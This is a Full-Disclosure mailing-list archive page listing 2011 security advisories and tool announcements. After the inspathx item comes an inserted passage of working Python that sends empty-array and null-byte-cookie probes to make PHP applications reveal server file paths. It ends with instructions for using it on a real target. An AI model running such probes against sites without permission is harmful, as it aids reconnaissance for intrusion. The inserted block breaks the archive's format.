[Full-disclosure] Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability

2011-02-01 Thread YGN Ethical Hacker Group
Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability 1. OVERVIEW Zikula 1.2.4 and lower versions were vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND Zik

[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder

2011-02-01 Thread YGN Ethical Hacker Group
Check the update via svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx CHANGELOG === covered remaining checks (empty array, null cookie) in Full_Path_Disclosure (http://www.owasp.org/index.php/Full_Path_Disclosure) of OWASP Application Security Desk Reference (ASDR) Projec
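The two checks named in the changelog (empty array, null cookie) are standard ways of provoking a PHP full path disclosure: an `?param[]=` query hands an array to code expecting a string, and a session cookie containing a null byte makes `session_start()` complain; in both cases the PHP warning includes the absolute path of the script. The following is an added example, not inspathx's own code, showing how to build those two probes and pull disclosed paths out of a response body; the helper names, the `page` parameter and the sample responses are constructed for illustration.

```python
import re
from urllib.parse import urlencode

# PHP warnings end with "... in /path/to/script.php on line N" (HTML output
# wraps the path and line in <b> tags, so tags are stripped before matching).
# Unix (/...) and Windows (C:\...) paths are both accepted.
FPD_RE = re.compile(
    r"\bin\s+(?P<path>(?:/|[A-Za-z]:\\)[^\s<>\"']+?\.(?:php|inc|phtml))"
    r"\s+on\s+line\s+(?P<line>\d+)",
    re.IGNORECASE,
)
TAG_RE = re.compile(r"<[^>]+>")


def build_probes(url, param="page"):
    """Return (label, url, cookies) tuples for the two FPD probes.

    Hypothetical helper: 'page' is an assumed parameter name, pick one the
    target actually reads (e.g. from its links).
    """
    return [
        # Empty-array probe: ?page[]= turns $_GET['page'] into an array.
        ("empty_array", f"{url}?{urlencode({param + '[]': ''})}", {}),
        # Null-cookie probe: session id with an illegal character.
        ("null_cookie", url, {"PHPSESSID": "\x00"}),
    ]


def extract_paths(body):
    """Return sorted unique (absolute_path, line) pairs disclosed in body."""
    text = TAG_RE.sub("", body)
    return sorted(
        {(m.group("path"), int(m.group("line"))) for m in FPD_RE.finditer(text)}
    )


def webroot_candidates(paths):
    """Directory part of each disclosed script path (likely document roots)."""
    roots = set()
    for path, _ in paths:
        sep = "\\" if ":\\" in path[:3] else "/"
        roots.add(path.rsplit(sep, 1)[0])
    return sorted(roots)


def run_probes(url, fetch):
    """Run both probes through fetch(url, cookies) -> body; map label -> paths."""
    return {
        label: extract_paths(fetch(probe_url, cookies))
        for label, probe_url, cookies in build_probes(url)
    }


# Constructed sample responses (not captured from any real site).
SAMPLES = {
    "empty_array": (
        "<b>Warning</b>:  strlen() expects parameter 1 to be string, array given in "
        "<b>/var/www/html/modules/news/index.php</b> on line <b>42</b><br />"
    ),
    "null_cookie": (
        "<b>Warning</b>:  session_start(): The session id contains illegal characters, "
        "valid characters are a-z, A-Z, 0-9 and '-,' in "
        "<b>/var/www/html/index.php</b> on line <b>3</b><br />"
    ),
    "windows": "Warning: include(x.inc): failed to open stream in C:\\xampp\\htdocs\\site\\index.php on line 7",
    "clean": "<html><body>OK</body></html>",
}


def offline_fetch(probe_url, cookies):
    """Stand-in for an HTTP client: picks a canned body by probe type."""
    if "PHPSESSID" in cookies:
        return SAMPLES["null_cookie"]
    if "%5B%5D=" in probe_url:
        return SAMPLES["empty_array"]
    return SAMPLES["clean"]


if __name__ == "__main__":
    for label, found in run_probes("http://example.com/index.php", offline_fetch).items():
        print(label, found, webroot_candidates(found))
```

With a real target, replace `offline_fetch` with a function that performs the GET (for example with `requests.get(url, cookies=cookies).text`) and compare the disclosed directories across pages: a consistent document root across many scripts is the useful output, while a path that differs per request usually points at an include rather than the webroot.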

[Full-disclosure] [USN-1053-1] Subversion vulnerabilities

2011-02-01 Thread Marc Deslauriers
=== Ubuntu Security Notice USN-1053-1 February 01, 2011 subversion vulnerabilities CVE-2007-2448, CVE-2010-3315, CVE-2010-4539, CVE-2010-4644 === A security issue affects the fol

[Full-disclosure] Book Review: Computer Incident Response and Product Security by Damir Rajnovic

2011-02-01 Thread Shawn Merdinger
Hi FD folks, A short review of a new title on building a vendor product security response and team. I think this book would prove useful for vendors wishing to avoid the shame and humiliation of having vulns published when they could have avoided it with a process and team in place. https://info

[Full-disclosure] Travel letter #2; What we do for knowledge

2011-02-01 Thread mad . men
Some epics in this one as well :) Hello all, I am sitting in LAX right now. This last week I have been in Venezuela and Colombia. A small part of this trip was the dubious distinction that has resulted from around two years of work to setup. I have spoken with two cartels in the area. What m

[Full-disclosure] Cisco Security Advisory: Multiple Cisco WebEx Player Vulnerabilities

2011-02-01 Thread Cisco Systems Product Security Incident Response Team
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Security Advisory: Multiple Cisco WebEx Player Vulnerabilities Advisory ID: cisco-sa-20110201-webex Revision 1.0 For Public Release 2011 February 1 1600 UTC (GMT

[Full-disclosure] [USN-1055-1] OpenJDK vulnerabilities

2011-02-01 Thread Steve Beattie
=== Ubuntu Security Notice USN-1055-1 February 01, 2011 openjdk-6, openjdk-6b18 vulnerabilities CVE-2010-4351, CVE-2011-0025 === A security issue affects the following Ubuntu rel

Re: [Full-disclosure] PAPER: Attacking Server Side XML Parsers

2011-02-01 Thread Chris Evans
On Tue, Feb 1, 2011 at 5:55 PM, HI-TECH . < isowarez.isowarez.isowa...@googlemail.com> wrote: > Hello lists, > > the paper included in this email discusses, as the subject describes, the > issues of XML Parsers and how they can be exploited in a web > application environment. > > From the Preface: >